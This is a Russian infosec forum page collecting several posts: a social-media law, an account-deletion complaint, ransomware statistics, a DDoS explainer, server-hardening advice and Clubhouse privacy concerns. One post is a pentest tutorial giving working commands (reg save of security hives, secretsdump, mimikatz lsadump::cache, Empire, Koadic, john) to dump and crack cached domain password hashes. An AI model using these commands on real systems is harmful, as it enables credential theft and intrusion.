Сообщество - Информационная безопасность IT
Добавить пост

Информационная безопасность IT

1 413 постов 25 512 подписчиков

Популярные теги в сообществе:

Информационная безопасность медийных личностей и простых смертных

Информационная безопасность медийных личностей и простых смертных Интернет, Медиа, Законодательство, Информационная безопасность, Длиннопост

Вы наверное уже ни раз столкнулись с тем, что в сети вас пытались обмануть или даже угрожать вам. Вопрос один - почему конституционные права граждан не соблюдаются в интернет пространстве? Всё просто - анонимность позволяет хулиганить безнаказанно, но так было ранее.


Что изменилось?

https://rg.ru/2021/01/29/za-mat-v-socsetiah-vvodiatsia-shtra...


Соцсети должны будут удалять посты с использованием матерных слов. Закон об этом вступает в силу 1 февраля.


Он касается в целом мониторинга информации, несущей угрозу людям. Теперь ответственность за это будет возложена на администрации соцсетей.


С 1 февраля в соцсетях запретят ругаться матом

Речь идет о постах, пропагандирующих суицид, детскую порнографию, экстремизм и терроризм, призывы к несанкционированным митингам и массовым беспорядкам, пояснили "РГ" в Роскомнадзоре. "Только так можно обеспечить незамедлительность блокировки такой особо опасной информации, как трэш-стрим", - подчеркнули там. Запрет постов с нецензурной лексикой - лишь часть нового закона.

За нарушение новых правил администрация соцсети заплатит штраф от 800 тыс. до 4 млн рублей. В случае повторного правонарушения сумма штрафа будет увеличена до одной десятой совокупного размера суммы годовой выручки. В ведомстве при этом отметили, что у соцсетей есть право обратиться в Роскомнадзор, если возникнут сомнения, относить или нет информацию к запрещенной.

Санкции для авторов постов, использующих нецензурную лексику, не предусмотрено.

Технически сообщения в сетях и так давно фильтруются - например, проверяются на экстремизм, рассказал Николай Комлев, директор АПКИТ, председатель Совета ТПП РФ по развитию информационных технологий и цифровой экономики. "Сканирование контента - несложная задача, - добавил он. - Лексические анализаторы используются в компиляторах и интерпретаторах исходного кода языков программирования, в проверке правописания слов естественных языков. Применить эти инструменты для поиска мата в соцсетях не составит труда и на любом языке". Комлев отметил, что системы могут распознать и мат, зашифрованный латиницей или звездочками.


Володин предупредил депутатов по поводу мата в соцсетях

Выявить мат в потоке речи видеоролика тоже технически вполне возможно - роботы типа Алисы, Маруси, Siri выделяют и понимают наиболее употребимые слова, говорит Комлев. Однако такой анализ требует больше ресурсов, и точность выявления будет ниже, особенно если говорящий говорит, например, с набитым ртом или у него плохая дикция. "Полагаю, что законотворцы ограничатся анализом и контролем только текстовой информации, так как мат в устной речи труднее не только распознать, но и юридически доказать", считает глава АПКИТ.

Впрочем, по мнению Комлева, это не самая важная задача поддержания российской экономики и культуры.

Представители соцсетей "ВКонтакте", "Одноклассники" и Tik Tok отказались от комментариев.




+ Бонус в комметариях

+Чтиво http://shkola6-kalach.edusite.ru/p21aa1.html

https://vk.com/evim007?w=wall200623502_6511

Показать полностью

Что бы такое сделать, чтобы не работать и улучшить статистику... Залезем в чужой профиль на Госуслугах, а потом его удалим!

Сегодня я планировала утренний отдых и радостное сжигание масленицы, но что-то пошло не так...


Предыстория. В этом году у нас как всегда неожиданно для коммунальщиков выпал снег. И, как всегда, "техника не справлялась, подрядчик подводил". Пару лет назад я плюнула на написание жалоб на такое поведение на наш подмосковный Добродел, потому что приходили отписки "мы все убрали!" с левыми фотками. Нынче я решилась опять им писать. Создала заявку, что мол, вокруг нашего дома не чистят, снег тает и образуется огромная лужа. Жалобу эту прикрыли из-за "нескольких проблем в описании". Ну думаю, раз вы не хотите по-хорошему убирать снег, прицепившись к словам, что еще и лужа от него есть, то наделаю-ка я вам заявок на каждую беспокоящую меня проблему рядом с домом отдельно. В итоге получилось семь жалоб (наш дом, соседний, 3 снежных навала, парковочный карман и проезд у мусорной площадки). Решила вчера перед сном проверить как и что отписываются (из окна-то видела, что делают, но не доделывают).


Собственно, что было дальше. Вход на Добродел только через госуслуги. Пишет, что пароль неверный. Пробую телефон вместо почты - тот же ответ. В приложении после прикладывания пальца пишет, что нужно входить по логину-паролю, т.к. я якобы отключила возможность заходить из мобильного приложения с этого мобильного устройства. Хорошо, пробую через браузер заходить - не пускает. Тогда пробую сменить пароль, но мне ответ, что такого пользователя нет. WTF?!?! Ну ладно, думаю, разберусь утром.


Сегодняшнее утро. На компе все тоже самое. И при попытке ввода снилса тоже. Гуглю. Нахожу, что можно регистрироваться через Сберонлайн. Регаюсь. И захожу в девственно чистый новенький профиль. Проверяю госуслуги Московской области, теперь на них тоже стало можно зайти (вход только через госуслуги) и записать дочку к врачу. Но надо опять ввести снилсы-даты рождения. На Доброделе тоже все пусто. Проверяю карту сообщений по моему району - не нахожу. Пишу в чат на госуслуги, мол, что это за фигня, почему удален аккаунт. А у него вход либо по отпечатку пальца из приложения, либо по паролю из смс. Т.е. я в любом случае узнаю про попытку входа. Мне говорят, что может я заходила в центр обслуживания и просила удалить профиль...


А дальше произошло самое интересное! Я решила не только войти в папочку "Госуслуги" в моей почте, но и тыкнуть в "Госуслуги МО". И что я вижу???

Что бы такое сделать, чтобы не работать и улучшить статистику... Залезем в чужой профиль на Госуслугах, а потом его удалим! Интернет-портал Добродел, Длиннопост, Отписка, Чиновники, Халатность, Госуслуги, Свинство, Взлом, Информационная безопасность

Захожу во внутрь каждого письма, а там пишут, что я сама все эти проблемы позакрывала! Вот почему на карте сообщений эти обращения отсутствовали!

Пруфы на проблемы по ссылкам

https://dobrodel.mosreg.ru/claims/5128901

https://dobrodel.mosreg.ru/claims/5128873

https://dobrodel.mosreg.ru/claims/5128845

https://dobrodel.mosreg.ru/claims/5128810

https://dobrodel.mosreg.ru/claims/5128821

https://dobrodel.mosreg.ru/claims/5128768

https://dobrodel.mosreg.ru/claims/5128790

Кому не хочется тыкать, выглядит оно примерно вот так

Что бы такое сделать, чтобы не работать и улучшить статистику... Залезем в чужой профиль на Госуслугах, а потом его удалим! Интернет-портал Добродел, Длиннопост, Отписка, Чиновники, Халатность, Госуслуги, Свинство, Взлом, Информационная безопасность

Все закрыто подряд с 11:08 по 11:10. Это вообще как? На госуслугах мне ответа никакого пока не дали, кроме того, что по моим данным есть только одна учетная запись. Муж, работает в информационной безопасности, говорит, что должны быть логи про мою первую запись и что бесследно такое делать не получится. Кстати, именно он мне и порекомендовал в свое время сделать двухфакторную аунтификацию, иначе бы реально можно было съехать ответственным, что это аккаунт у меня увели из-за моей беспечности. Кстати, еще неизвестно, что за инфу оттуда могли взять, если это из-под него делалось.


В общем, теперь у меня однозначно нет доверия ни к нашей администрации, которая пытаясь улучшить статистику по ответам на заявки творит самоуправство, ни к сайту госуслуг. Данные я конечно про себя-детей внесла, но если опять подгадят уже удивляться не буду.


В общем, будьте и вы в курсе, что с вами на ровном месте такое может быть!


P.S. Путинские 10 т.р. за июль до меня тоже до сих пор идут, на этой неделе пенсионный отзванивался, сказали, что проблему нашли, все пришлют. Думала вначале, что учетка полетела из-за их "исправления ошибки", но похоже ноги растут из Добродела...


UPD: Уведомила сотрудников поддержки госуслуг в чатике, что т.к. мне ничего не разъяснили и игнорировали мою просьбу создать инцидент, то я буду буду обращаться в Роскомнадзор, ФСТЭК, прокуратуру и в другие органы и приложу переписку с ними как доказательство моих попыток разобраться в ситуации до обращения в эти органы. В том числе и указала, что произошедшее подпадает под статью 272 УК РФ. И таки они завели инцидент, правда с оговоркой, что "В зависимости от сложности срок решения может составить до нескольких дней." Пару дней подожду, что за ответ мне придет

Показать полностью 2

Почему функция местоположения навязывается пользователям?

Друзья, ниже будет не то чтобы локальная проблема, а скорее для "бомбёжки".

Как Вы относитесь к тому что различные приложения и сервисы "разучились" работать без GPS? Лично для меня это крайне не удобно, считаю что это бессмысленная и существенная трата заряда в течении дня, да и  "большому брату" не обязательно знать мое точное место положение.


К примеру, у меня были фитнес часы amazfit bip которые показывали погоду подгружая её через фирменное приложение на смартфоне, для того что бы оно это делало, нужно было просто выбрать свой город в настройках.

Сейчас у меня amazfit GTS, вроде более навороченная модель, а нет погоду он определяет только при включённом GPS. Выключил? остался без погоды.

Далее сервис гугла по поиску потерянного телефона, раньше работал без нареканий и определял положение по мобильным сетям, сейчас будьте добры ходить всегда с включённым GPS. Нет? Неудачника ответ, попрощайтесь с "Чёрным зеркалом"

Теперь Samsung, сервис по автоматическому включению WiFi с новой прошивкой перестал работать без GPS т.е. ранее я включал эту функцию что бы вне дома батарею не жрал Wifi, а когда приходил смарт сам включал модуль, было супер удобно, но теперь что бы экономить на Wifi я должен отдать заряд GPS.....

Возможно Вы конечно в курсе как обойти все эти "хотелки", буду рад если подскажете, самостоятельно очевидных ответов я не нашёл, да и думаю их просто нет, а новомодные тенденции мозг связывает скорее с теориями заговора, чем просто с заботой о пользователях. 

Рейтинг самых активных и жадных вымогателей 20|21 (исследование Group-IB)

Рейтинг самых активных и жадных вымогателей 20|21 (исследование Group-IB) Вирусы-шифровальщики, Вымогательство, Хакеры, Длиннопост, Group-IB

Шифровальщики фактически стали киберугрозой №1 как для бизнеса, так и для государственных органов: число успешных атак в прошлом году выросло более чем на 150% к 2019 году, а средний размер суммы выкупа увеличился более чем в два раза и составил в 2020 году $170 000, говорится в свежем отчете Group-IB «Программы-вымогатели 2020-2021 гг».


В первую очередь в зоне риска оказались крупные корпоративные сети — целенаправленные атаки вымогателей ( The Big Game Hunting) парализовали в 2020 году работу таких гигантов как Garmin, Canon, Campari, Capcom и Foxconn. Простой от одной атаки составлял в среднем 18 дней. Большинство атак, проанализированных Group-IB, произошли в Северной Америке и Европе, где расположено большинство компаний из списка Fortune 500, а также в Латинской Америке и Азиатско-Тихоокеанском регионе.

Рейтинг самых активных и жадных вымогателей 20|21 (исследование Group-IB) Вирусы-шифровальщики, Вымогательство, Хакеры, Длиннопост, Group-IB

Самыми жадными вымогателями оказались группы Maze, DoppelPaymer и RagnarLocker — сумму выкупа, которые они требовали от жертвы, составляла в среднем от $1 000 000 до $2 000 000.


Преступные группы Conti, Egregor и DarkSide присоединились к «золотой лихорадке» только в прошлом году, но были настолько активны, что заняли верхние строчки неофициального рейтинга вымогателей. В топ-5 самых активных семейств шифровальщиков, по данным Group-IB, вошли Maze, Egregor, Conti, REvil и DoppelPaymer. Некоторые из них к концу года сошли с дистанции: Egregor и Netwalker пострадали от действий полиции, а операторы Maze в конце 2020 года объявили о своем уходе. Несмотря на эти события, криминальный бизнес вымогателей в 2021 году, по прогнозам экспертов Group-IB, будет по-прежнему процветать.

Рейтинг самых активных и жадных вымогателей 20|21 (исследование Group-IB) Вирусы-шифровальщики, Вымогательство, Хакеры, Длиннопост, Group-IB

В России, несмотря на негласное правило у киберпреступников «не работать по РУ», действовала русскоязычная преступная группа OldGremlin — впервые Group-IB рассказала о ней в отчете в сентябре прошлого года. Начиная с весны 2020 года OldGremlin провела не менее 9 кампаний и атаковала исключительно российские цели — банки, промышленные предприятия, медицинские организации и разработчиков софта. В августе 2020 года жертвой OldGremlin стала крупная компания с сетью региональных филиалов — за расшифровку с нее потребовали выкуп в $50 000.


«За пандемию программы-вымогатели стали главной киберугрозой для всего мира, в том числе для России, — говорит Олег Скулкин, ведущий специалист Лаборатории компьютерной криминалистики Group-IB. — В прошлом году мы видели многочисленные атаки OldGremline на российские предприятия, IT-компании и финансовые учреждения. В этом году эксперты уже наблюдают активность с традиционными группами типа RTM, также переключившихся на на использование шифровальщиков».

Рейтинг самых активных и жадных вымогателей 20|21 (исследование Group-IB) Вирусы-шифровальщики, Вымогательство, Хакеры, Длиннопост, Group-IB

Очень организованная преступность


Одной из основных движущих сил феноменального роста программ-вымогателей стала модель Ransomware-as-a-service («Вымогательство как услуга»). Ее смысл заключается в том, что разработчики продают или сдают в аренду свои вредоносные программы партнерам для дальнейшей компрометации сети, заражения и развертывания вымогателей. Вся полученная в виде выкупа прибыль затем распределялась между операторами и партнерами программы. Команда Group-IB DFIR отмечает, что 64% всех атак вымогателей, проанализированных в 2020 году, были связаны с операторами, использующих модель RaaS.


Еще одна тенденция 2020 года — коллаборации между разными преступными группами. Group-IB Threat Intelligence & Attribution system зафиксировала в прошлом году появление в андеграунде 15 новых публичных партнерских программ-вымогателей. Действующие преступные группы, использующие вредоносные программы Trickbot, Qakbot и Dridex, все чаще помогали операторам программ-вымогателей получать первоначальный доступ к корпоративным сетям.

Рейтинг самых активных и жадных вымогателей 20|21 (исследование Group-IB) Вирусы-шифровальщики, Вымогательство, Хакеры, Длиннопост, Group-IB

Главным вектором атак для большинства банд вымогателей оказались публичные RDP-серверы. В 52% всех атак, проанализированных командой Group-IB DFIR, для получения первоначального доступа к сети использовались именно RDP-серверы, за ними следовали фишинг (29%) и эксплуатация общедоступных приложений (17%).


Прежде чем зашифровать данные, операторы вымогателей проводили в среднем 13 дней в скомпрометированной сети, стараясь предварительно найти и удалить все доступные резервные копии, чтобы жертва не могла восстановить зашифрованные файлы. Еще одним фактором успеха, позволившим бандам получать выкуп, стало предварительное хищение критически важных данных — документов, отчетов, чтобы использовать их в качестве рычага для давления на жертву — моду на подобный «двойной удар» задала печально известная группа Maze.


Учитывая, что большинство атак шифровальщиков управляются человеком — «вручную», специалистам по информационной безопасности критически важно понимать, какие тактики, техники и процедуры (TTP) используют злоумышленники. Полный технический анализ TTPs атакующих, сопоставленных в соответствии с MITRE ATT&CK®, публичной базой знаний, в которой собраны тактики и техники целевых атак, а также рекомендации по поиску и обнаружению угроз, собранные командой Group-IB Digital Forensics and Incident Response (DFIR), уже сейчас доступны в новом отчете «Программы-вымогатели 2020-2021 гг».

Рейтинг самых активных и жадных вымогателей 20|21 (исследование Group-IB) Вирусы-шифровальщики, Вымогательство, Хакеры, Длиннопост, Group-IB

Источник

Показать полностью 5

DDoS-атака — что это такое?

DDoS-атака (Distributed Denial of Service attack) — комплекс действий, способный полностью или частично вывести из строя интернет-ресурс. В качестве жертвы может выступать практически любой интернет-ресурс, например веб-сайт, игровой сервер или государственный ресурс. На данный момент практически невозможна ситуация, когда хакер в одиночку организует DDoS-атаку. В большинстве случаев злоумышленник использует сеть из компьютеров, зараженных вирусом. Вирус позволяет получать необходимый и достаточный удаленный доступ к зараженному компьютеру. Сеть из таких компьютеров называется ботнет. Как правило, в ботнетах присутствует координирующий сервер. Решив реализовать атаку, злоумышленник отправляет команду координирующему серверу, который в свою очередь дает сигнал каждому боту начать выполнение вредоносных сетевых запросов.

DDoS-атака — что это такое? DDoS, Хакеры, Длиннопост

Причины DDoS-атак


Мотивы для осуществления DDoS-атак могут быть самыми разнообразными: от конкуренции до личной неприязни. Мы собрали основные причины DDoS-атак и решили поделиться с Вами этой информацией:


Личная неприязнь


Эта причина встречается довольно часто. Некоторое время назад независимый журналист-исследователь Брайан Кребс раскрыл деятельность крупнейшего сервиса по осуществлению заказных DDoS-атак — vDOS. Информация была представлена в полных подробностях, что вызвало арест организаторов данного сервиса. В ответ хакеры организовали атаку на блог журналиста, мощность которой достигла 1 Тбит/с. Эта атака стала самой мощной в мире за все годы.


Развлечение


В настоящее время становится все проще организовать примитивную DDoS-атаку своими силами. Такая атака будет крайне не совершенна и не анонимна. К сожалению, большинство из тех, кто решил ощутить себя в роли «хакера», не догадываются ни о первом, ни о втором. Тем не менее, многие школьники часто практикуют DDoS-атаки. Итог таких случаев бывает самым разнообразным.


Политический протест (хактивизм)


Одной из первых атак, имеющих социальную почву является DDoS-атака, реализованная в 1996 году хакером Omega. Omega являлся членом хакерской коалиции «Cult of the Dead Crew» (cDc). Термин хактивизм стал популярным в СМИ в связи с участившимися кибератаками, имеющим социальную почву. Типичными представителями хактивистов являются группы Anonymous и LulzSec.


Недобросовестная конкуренция


Такие мотивы часто бывают в индустрии игровых серверов, но и в отрасли торговли такие случаи встречаются довольно нередко. Достаточно действенный способ недобросовестной конкуренции, способный разрушить репутацию торговой площадки, если её владельцы вовремя не обратятся за помощью к специалистам. Такой мотив можно выделить среди остальных, как наиболее встречающийся.


Вымогательство или шантаж


В этом случае злоумышленник требует с потенциальной жертвы денежную сумму за несовершение атаки. Либо за её прекращение. Часто жертвами таких атак становятся крупные организации, например в течение 2014 были атакованы банк «Тинькофф» и IT-ресурс Хабрахабр, крупнейший торрент-трекер Rutracker.org (как это было?).

Последствия DDoS-атак


Последствия DDoS-атак могут быть самыми разнообразными, от отключения датацентром Вашего сервера до полной потери репутации ресурса и клиентопотока. Многие организации с целью экономии неосознанно выбирают недобросовестных провайдеров защиты, что часто не приносит никакой пользы. Во избежание подобных проблем мы рекомендуем обратиться к профессионалам в своей отрасли.


Атаки, вошедшие в историю Интернет


Технический прогресс идет семимильными шагами и злоумышленники, в свою очередь, прикладывают все усилия, чтобы не стоять на месте и реализовывать все более сложные и мощные атаки. Мы собрали краткое описание наиболее интересных случаев, которые вошли в историю DDoS-атак. Часть из них может показаться обычными по современным меркам, но во время, когда они происходили, это были очень масштабные атаки.

Пинг смерти (Ping Of Dead). Способ атаки, базирующийся на использовании команды ping. Эта атака получила популярность в 1990-х годах, благодаря несовершенству сетевого оборудования. Суть атаки заключается в отправке на сетевой узел одного запроса ping, при этом в тело пакета включаются не стандартные 64 байта данных, а 65535 байт. При получении такого пакета у оборудования переполнялся сетевой стэк и что вызывало отказ в обслуживании.

Атака, повлиявшая на стабильность работы Интернет. В 2013 году компания Spamhaus стала жертвой атаки мощностью более 280 Гбит/с. Самое интересное то, что для атаки хакеры использовали DNS-сервера из сети интернет, которые в свою очередь были очень загружены большим количеством запросов. В те сутки миллионы пользователей жаловались на медленно загружающиеся страницы в связи с перегруженности службы DNS.

Рекордная атака с трафиком более 1 Тбит/с. В 2016 году хакеры пытались атаковать нас пакетной атакой со скоростью 360 Mpps и 1 Тбит/с. Эта цифра стала рекордной за время существования Интернет. Но и под такой атакой мы устояли и нагрузка на сеть лишь незначительно ограничила свободные ресурсы сетевого оборудования.


Характеристика атак сегодня


Исключая пиковые атаки можно сказать, что мощность атак с каждым годом растет более, чем в 3-4 раза. География атакующих от года к году изменяется лишь частично, ведь это обусловлено максимальным количеством компьютеров в определенной стране. Как видно из квартального отчета за 2016 год, подготовленного нашими специалистами, странами-рекордсменами по количеству ботов выступают Россия, США и Китай.


Какие бывают DDoS-атаки?


На данный момент типы атак можно разделить на 3 класса:


Атаки, направленные на переполнение канала

К этому типу атак можно отнести DNS амплификацию, ICMP флуд, UDP флуд и другие атаки с амплификацией;


Атаки, использующие уязвимости стека сетевых протоколов

Наиболее популярными и интересными атаками этого типа являются ACK/PUSH ACK флуд, SYN флуд, TCP null/IP null атака, Пинг смерти (Ping of death);


Атаки на уровень приложений

Среди атак на уровень приложений можно выделить следующие типы: HTTP флуд, атака фрагментированными HTTP пакетами, атака медленными сессиями (SlowLoris).


Источник - 我的

Показать полностью 1

Cпособы выгрузки учетных записей из кэша домена

В этой статье будет рассмотрена атака с целью получения учетных записей из кэша домена и различные техники для извлечения хэшей паролей через эксплуатацию пользователя домена.

Domain Cache credential (DCC2)


Microsoft Windows хранит информацию о предыдущей авторизации пользователей локально. Соответственно, эти сведения используются в случае, если сервер авторизации (logon server) окажется недоступным. Эта технология носит название Domain Cache credential (или по другому MSCACHE или MSCASH хэш), которая сортирует хэши паролей пользователей, чтобы вы не смогли выполнить атаки навроде pass-the-hash. Для генерации хэшей используется алгоритм MSCACHE, хранящихся локально в реестре операционной системы Windows (по умолчанию, последние 10 хэшей).

Существует две версии MSCASH/MSCACHE (или DCC):

MSCACHEV1 или DCC1, используемый до Vista и Server 2003

MSCACHEV2 или DCC2, используемый после Vista и Server 2003

Переходим к рассмотрению техник для извлечения хэшей.


Metasploit


Metasploit – первый инструмент в нашем списке, помогающий пентестеру извлекать MSCACHE хэши, хранимые в реестре. Соответствующий модуль извлекает хэши домена, которые были закэшированы в результате настройки групповой политики (GPO). По умолчанию Windows хранит информацию о 10 последних успешных авторизаций:

use post/windows/gather/cachedump

set session 2

exploit

По результатам отработки модуля выгружаются хэши паролей из DCC2/MSCACHE, как показано на рисунке ниже:

Cпособы выгрузки учетных записей из кэша домена Кэш, Домен, Пароль, Login password, Длиннопост

Impacket


Этот тип хэшей также можно извлечь при помощи Python и библиотек impacket. Перед использованием данной техники следует сохранить ветви реестра system и security на локальной машине при помощи следующих команд:

reg save hklm\system c:\system

reg save hklm\security c:\secuirty

Cпособы выгрузки учетных записей из кэша домена Кэш, Домен, Пароль, Login password, Длиннопост

Рисунок: Сохранение ветвей реестра на локальную машину


Далее скопируйте полученные файлы туда, где установлен impacket. В нашем случае копирование происходит в систему с Kali Linux. Затем для извлечения DCC2/MSCACHE хэшей используем следующую команду:

python secretsdump.py -security -system system LOCAL

Результат отработки скрипта показан на рисунке ниже:


Cпособы выгрузки учетных записей из кэша домена Кэш, Домен, Пароль, Login password, Длиннопост

Рисунок: Выгрузка хэшей при помощи скрипта secretsdump.py


Mimikatz


Ни для кого не секрет, что mimikatz – одна из наилучших утилит в арсенале пентестера для извлечения учетных записей в ОС Windows. С целью извлечения DCC2 / MSCACHEv2 хэшей необходимо установить mimikatz на скомпрометированной машине и выполнить следующую команду:

privilege::debug

token::elevate

lsadump::cache

Результат выполнения вышеуказанных команд показан на рисунке ниже:

Cпособы выгрузки учетных записей из кэша домена Кэш, Домен, Пароль, Login password, Длиннопост

Рисунок: Выгрузка хэшей при помощи mimikatz


PowerShell Empire


Переходим к следующей технике. В PowerShell Empire есть модуль для извлечения MSCACHEV2 хэшей из реестра скомпрометированной машины. Загрузите и запустите Empire в вашей локальной системе, скомпрометируйте целевой хост с целью использования пост-модуля, а затем введите следующую команду:

usemodule credentails/mimikatz/cache

set agent <agent_id>

execute

Результаты работы модуля по выгрузке MSCACHEv2 хэшей показаны на рисунке ниже:

Cпособы выгрузки учетных записей из кэша домена Кэш, Домен, Пароль, Login password, Длиннопост

Рисунок: Результат выгрузки хэшей при помощи модуля в PowerShell Empire


Koadic


Как и в случае с Powershell Empire, вы можете использовать утилиту Koadic для извлечения DCC2 хэшей при помощи следующего модуля:

use mimikatz_dotnet2js

set MIMICMD lsadump::cache

Результаты работы этого модуля показаны на рисунке ниже:

Cпособы выгрузки учетных записей из кэша домена Кэш, Домен, Пароль, Login password, Длиннопост

Рисунок: Извлечение хэшей при помощи Koadic


Python скрипт


Как и в примере с impacket вы можете воспользоваться скриптом mscache.py для извлечения MSCACHEV2 хэшей. Загрузите скрипт с github, и во время запуска в качестве параметров укажите пути к выгруженным файлам (как рассматривалось в разделе с impacket):

python mscache.py --security /root/Desktop/security –system /root/Desktop/system

Результаты работы скрипта показаны на рисунке ниже:

Cпособы выгрузки учетных записей из кэша домена Кэш, Домен, Пароль, Login password, Длиннопост

Рисунок: Выгрузка хэшей при помощи скрипта mscache.py


Расшифровка полученных хэшей


Как мы уже знаем, эти хэши не используются во время атак pass the hash, и нам нужна утилита john the ripper для расшифровки:

john --format=mscasch2 --wordlist=/usr/share/wordlists/rockyou.txt mhash

В результате получаем пароль в открытом виде для указанного хэша. Старайтесь не путаться между понятиями DCC2 и MSCACHEV2/MSCASH. Эти хэши идентичные и могут извлекаться при помощи вышеуказанных техник.

Cпособы выгрузки учетных записей из кэша домена Кэш, Домен, Пароль, Login password, Длиннопост

Источник здесь - 我的

Показать полностью 8

Shodan.io | Как спастись, куда бежать начинающему разработчику/сис.админу?

Сей материал будет полезен новичкам в вопросе настройки своих серверов и сетевой безопасности. Прошу разбирающихся не бить ссанными тряпками, пост писался из благих побуждений и в некоторых вопросах я могу быть не совсем корректен.

Занимаюсь веб и не очень разработкой порядка восьми лет, однако руки до VDS и собственных серверов дошли совсем недавно, так как являюсь дуб дубом в вопросе настройки серверов и человеком не особо интересующимся трендами -- пропустил явление "shodan"... как оказалось -- очень зря, за что и поплатился в последствии и от чего хочу оберечь новичков.

Кратко о shodan. Это поисковый сервис который рандомным образом генерирует IP адресы и проверяет что по ним расположено, в следствии неправильной настройки сервера некоторые данные могут утечь (shodan не щадит никого) либо к серверу может быть получен несанкционированный доступ. К примеру, есть такой пакет для linux совместимых систем как ProFTPD (FTP сервер, что логично) и в нём есть (был?) эксплоит (CVE-2019-12815) позволяющий выполнять код и доставать "секретную" информацию БЕЗ авторизации. Актуально для версии пакета 1.3.5b.
Патч на гитхаб: https://github.com/lcartey/proftpd-cve-2019-12815
Чем опасен этот эксплоит помимо очевидного "выполнять код"? Да всё очень просто, если у вас к серверу привязан домен и не стоит патч на proftpd, то последний любезно предоставит информацию о нём.

Shodan.io | Как спастись, куда бежать начинающему разработчику/сис.админу? Информационная безопасность, Linux, Shodan, Настройка, Сервер, VPS, Длиннопост

Опасно это в первую очередь для тех у кого не самые мощные сервера и нет защиты от DDoS атак. Рекомендую установить патч либо использовать SFTP чтобы не спалить данные о домене. Если ваш IP таки был связан доменом (раскрыт), вам стоит обратиться к провайдеру для его смены, т.к он является скомпрометированным, исправить сие невозможно.

Если вы используете услуги аренды VDS серверов, крайне не рекомендую вообще указывать реальный домен при начале аренды (актуально как минимум для firstvds).

Если вы используете на своём сервере Apache2 -- настоятельно рекомендую озаботиться об установке на него патчей если таковые имеются (а у апача их достаточно, в зависимости от версии), либо же установить nginx и работать с ним.

Также крайне не рекомендую при наличии домена, разрешать доступ к серверу через IP.
Для себя я решил проблему с доступом через добавление в конфигурацию nginx'а следующих строк:

if ($host !~* example\.com) { # проверяет $host на наличие в нём вашего домена

return 444; # вернёт пустой ответ.

}

# эта конфигурация будет работать и с поддоменами.

Для своих сайтов я использую Cloudflare который прекрасно справляется с экранированием запросов и инициатор запросов никогда не получит ваш реальный IP адрес.

Если вы используете свои сертификаты но используете и Cloudflare -- стоит изменить этот сертификат на Origin сертификат от Cloudflare. Зачем? Для того чтобы при обращении через IP на 443-й порт (если таковой активен, при наличии сертификата) -- не сообщить злоумышленникам домен. Чем бережнее вы относитесь к секретности IP, тем меньше будет вероятность DDoS атаки, поскольку например Cloudflare -- успешно их отражает (в большинстве случаев).

Не стоит думать что если между IP адресом вашего сервера и доменом была установлена связь, вас никогда не затронет проблема безопасности. У каждого разные причины для тех или иных поступков, будь то просто зависть или попытка устранить конкурента. Будьте бдительней, господа!

В заключении хочу отметить что Shodan при всей своей "опасности", в правильных руках -- золото. Shodan (и ему подобные) изучает полученную информацию о вашем сервере и исходя из версий может сообщать о тех или иных эксплоитах (они не всегда обязаны присутствовать).
Желаю вам успехов во всех ваших проектах и  начинаниях, друзья!

Ну а я после этого поста готовлюсь огребать минусы от "знатоков". Тем не менее, я сообщил о том о чём знал и теперь моя совесть чиста, надеюсь кому-нибудь да поможет.
Показать полностью 1

Clubhouse записывает ваши разговоры и имеет другие недостатки

Clubhouse записывает ваши разговоры и имеет другие недостатки Clubhouse, Интернет, Конфиденциальность, Информационная безопасность, Социальные сети, Длиннопост

Одной из «особенностей» Clubhouse является то, что он недолговечен. Вы не можете послушать его позже или даже поставить на паузу комнату, в которой находитесь. Вы должны появиться вживую, чтобы принять участие в этом опыте. Это то, что отличает его, скажем, от подкастов, которые записываются и их можно слушать в любое время. Вы даже не можете записывать разговоры в Clubhouse.

Кроме того, Clubhouse может записывать и записывает то, что вы говорите. Политика конфиденциальности приложения гласит, что комнаты Clubhouse записываются:

"Исключительно с целью поддержки расследования инцидентов мы временно записываем звук в комнате, пока она активна. Если пользователь сообщает о нарушении доверия и безопасности, пока комната активна, мы сохраняем звук для целей расследования инцидента, а затем удаляем его, когда расследование завершено. Если об инциденте в комнате не сообщается, мы удаляем временную аудиозапись, когда комната заканчивается."

Это означает, что если кто-то действительно сообщает о проблеме, всё, что произошло в комнате, записывается и сохраняется. И в Clubhouse не совсем ясно, что с ним происходит, кроме того, что он сохраняется, чтобы компания могла принять решение. Здесь не сказано, кто может это слушать и при каких условиях.

•••

Даже если вы ещё не создали учётную запись, но у кого-то из ваших знакомых она есть большая вероятность, что у Clubhouse уже есть ваш номер телефона. Это связано с тем, что приложение побуждает пользователей загружать всю свою базу данных контактов, чтобы отправлять приглашения. Вы можете пригласить только того, кто находится в ваших контактах, и это не включает в себя возможность делиться только определёнными контактами. Всё или ничего.

Кроме того, эти друзья могли не только поделиться своим списком контактов, но и если они подключаются к своим профилям в социальных сетях, эта информация также собирается. В Clubhouse прямо говорится, что когда вы «создаёте свою учётную запись и / или аутентифицируетесь в сторонней службе, такой как Twitter, мы можем собирать, хранить и периодически обновлять информацию, связанную с этой сторонней учётной записью, такую как ваши списки друзей или подписчиков."

Что, если, скажем, вас вообще не интересует Clubhouse? По-прежнему нет механизма для получения какой-либо личной информации о вас, будь то по номеру телефона или через другие социальные сети, такие как Twitter или Instagram.

•••

Фактически, даже если у вас есть учётная запись, вы не можете удалить её, не отправив электронное письмо в службу поддержки. В приложении нет возможности удалить вашу учётную запись, и также нет никаких инструкций о том, что делать, если вы хотите удалить её. Вы должны отправить электронное письмо на адрес «support@alphaexplorationco.com», чтобы запросить аннулирование вашей учётной записи, и дождаться, пока кто-нибудь примет меры.

•••

Один из самых больших вопросов, связанных с Clubhouse, - как он собирается в конечном итоге зарабатывать деньги. Изучая политику конфиденциальности, становится ясно, что она, вероятно, будет включать в себя какую-то форму рекламы или спонсорской системы. Чтобы подготовиться к этому, Clubhouse даёт понять, что «может передавать персональные данные нашим нынешним и будущим аффилированным лицам».

Это нормально, но в том же разделе чётко указано, что Clubhouse «может передавать категории персональных данных, описанные выше, без дополнительного уведомления». Это означает, что вы не имеете права знать, что ваша личная информация, собранная Clubhouse, теперь используется за пределами Clubhouse.

•••

В политике конфиденциальности говорится, что для отслеживания ваших действий в Clubhouse и в Интернете используются файлы cookie, пиксели и технологии отслеживания, даже если они в настоящее время не монетизируют приложение. Это подтверждается политикой конфиденциальности, а также мониторингом трафика, который показывает, что он использует инструменты отслеживания активности и аналитики, чтобы понять, что вы делаете с приложением.

В политике конфиденциальности компании также прямо говорится:

